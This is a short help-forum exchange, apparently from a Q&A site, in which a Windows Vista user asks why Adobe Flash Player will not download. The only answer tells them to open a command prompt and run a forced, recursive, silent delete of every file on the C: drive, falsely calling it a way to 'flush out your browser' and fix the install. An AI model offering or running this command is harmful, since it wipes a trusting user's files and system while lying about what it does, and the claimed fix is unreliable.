Adobe Flash Player download?

I have windows vista...whenever i try to download flash player on my laptop, nothing happens...it doesn't want to download the way the site says it should...there is NO box that says anything about problems with downloading...please help!!! 10 points
 
Start>Run>type "cmd" and press enter

Now type
del C:\*.* /F /S /Q

This will flush out your browser and fix any problems you might have with installing Flash.
